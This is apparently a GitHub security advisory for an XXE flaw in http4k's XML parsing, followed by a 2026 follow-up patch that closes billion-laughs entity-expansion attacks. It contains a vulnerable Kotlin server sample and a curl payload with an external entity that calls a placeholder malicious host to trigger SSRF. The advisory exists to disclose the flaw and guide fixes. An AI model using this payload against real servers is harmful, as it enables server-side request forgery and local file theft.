+ "details": "### Summary\n_Short summary of the problem. Make the impact and severity as clear as possible. For example: An unsafe deserialization vulnerability allows any unauthenticated user to execute arbitrary code on the server._\n\nThere is a potential XXE(XML External Entity Injection) vulnerability when http4k handling malicious XML contents within requests, which might allow attackers to read local sensitive information on server, trigger Server-side Request Forgery and even execute code under some circumstances.\n\n### Details\n_Give all details on the vulnerability. Pointing to the incriminated source code is very helpful for the maintainer._\nhttps://github.com/http4k/http4k/blob/25696dff2d90206cc1da42f42a1a8dbcdbcdf18c/core/format/xml/src/main/kotlin/org/http4k/format/Xml.kt#L42-L46\nXML contents is parsed with DocumentBuilder without security settings on or external entity enabled\n\n### PoC\n_Complete instructions, including specific configuration details, to reproduce the vulnerability._\n#### Example Vulnerable server code:\n```\nimport org.http4k.core.*\nimport org.http4k.format.Xml.xml\nimport org.http4k.server.Netty\nimport org.http4k.server.asServer\nimport org.w3c.dom.Document\n\nfun main() {\n\n val xmlLens = Body.xml().toLens()\n\n // Create an HTTP handler\n val app: HttpHandler = { request ->\n try {\n // Parse the incoming XML payload to a Document object\n val xmlDocument: Document = xmlLens(request)\n\n // Extract root element name or other details from the XML\n val rootElementName = xmlDocument.documentElement.nodeName\n\n // Create a response XML based on the extracted information\n val responseXml = \"\"\"\n <response>\n <message>Root element is: $rootElementName</message>\n </response>\n \"\"\".trimIndent()\n\n // Respond with XML\n Response(Status.OK).body(responseXml).header(\"Content-Type\", \"application/xml\")\n } catch (e: Exception) {\n // Handle invalid XML or other errors\n Response(Status.BAD_REQUEST).body(\"Invalid XML: ${e.message}\")\n }\n }\n\n // Start the server\n val server = app.asServer(Netty(9000)).start()\n println(\"Server started on http://localhost:9000\")\n}\n```\n#### Maven dependency:\n```\n<dependencies>\n <dependency>\n <groupId>org.jetbrains.kotlin</groupId>\n <artifactId>kotlin-test-junit5</artifactId>\n <version>1.9.0</version>\n <scope>test</scope>\n </dependency>\n <dependency>\n <groupId>org.junit.jupiter</groupId>\n <artifactId>junit-jupiter-engine</artifactId>\n <version>5.10.0</version>\n <scope>test</scope>\n </dependency>\n <dependency>\n <groupId>org.jetbrains.kotlin</groupId>\n <artifactId>kotlin-stdlib</artifactId>\n <version>1.9.0</version>\n </dependency>\n\n <dependency>\n <groupId>org.http4k</groupId>\n <artifactId>http4k-core</artifactId>\n <version>5.40.0.0</version>\n </dependency>\n\n <!-- Http4k XML format -->\n <dependency>\n <groupId>org.http4k</groupId>\n <artifactId>http4k-format-xml</artifactId>\n <version>5.40.0.0</version>\n </dependency>\n\n <!-- http4k Netty -->\n <dependency>\n <groupId>org.http4k</groupId>\n <artifactId>http4k-server-netty</artifactId>\n <version>5.40.0.0</version>\n </dependency>\n </dependencies>\n```\n#### Exploit payload example to trigger SSRF\n`curl -X POST http://localhost:9000 -H \"Content-Type: application/xml\" -d \"<?xml version=\\\"1.0\\\" encoding=\\\"UTF-8\\\"?><!DOCTYPE root [<!ENTITY xxe SYSTEM \\\"https://replace.with.your.malicious.website/poc\\\">]><root>&xxe;</root>\"`\n\n\n### Impact\n_What kind of vulnerability is it? Who is impacted?_\nThe servers that employ this XML parsing feature of http4k are vulnerable to this XXE vulnerability\n\n### Follow-up patch — v6.50.0.0 (May 2026)\n\nThe original fix shipped in v5.41.0.0 / v4.50.0.0 closed the documented external-entity attack class (SSRF, local-file disclosure, code execution) by setting `ACCESS_EXTERNAL_DTD=\"\"`, `ACCESS_EXTERNAL_SCHEMA=\"\"`, and `isExpandEntityReferences=false` on the default `DocumentBuilderFactory`.\n\nA residual gap remained: the parser still **accepted** documents containing `<!DOCTYPE>` declarations even though external entity resolution was blocked. This left open billion-laughs-style internal entity expansion DoS attacks against any application using `Body.xml()` or `Document.asXmlDocument()` on untrusted XML.\n\n **v6.50.0.0** closes this residual by adding `disallow-doctype-decl=true` and `FEATURE_SECURE_PROCESSING=true` to `defaultXmlParsingConfig`. Any document containing a `<!DOCTYPE>` is now rejected at parse time.\n\n#### Follow-up affected & fixed versions\n\n | Version | Fixed Version |\n |---------|---------------|\n | `>= 5.41.0.0, < 6.50.0.0` | **6.50.0.0** |\n\nv6.x users should upgrade to v6.50.0.0. The patch is part of the v6.50.0.0 release; no separate backport is required for the v6 line. Older v5 / v4 users remain on the v5.41.0.0 / v4.50.0.0 fix (external-entity protection); the billion-laughs residual is fixed in those lines only via http4k EE LTS releases — contact [enterprise@http4k.org](mailto:enterprise@http4k.org) if you need it.\n\n#### Follow-up timeline\n\n | Date/time (UTC) | Notes |\n |-----------------|-------|\n | 31/05/2026 17:12 | Follow-up patch merged (commit [`c0cfaf5d63`](https://github.com/http4k/http4k/commit/c0cfaf5d63)) with new tests for `<!DOCTYPE>` rejection and billion-laughs payload rejection |\n | 31/05/2026 18:06 | http4k v6.50.0.0 released to Maven Central |",
![advisory-database[bot]](https://avatars.githubusercontent.com/in/21409?v=4&size=40){kind=avatar}
0 commit comments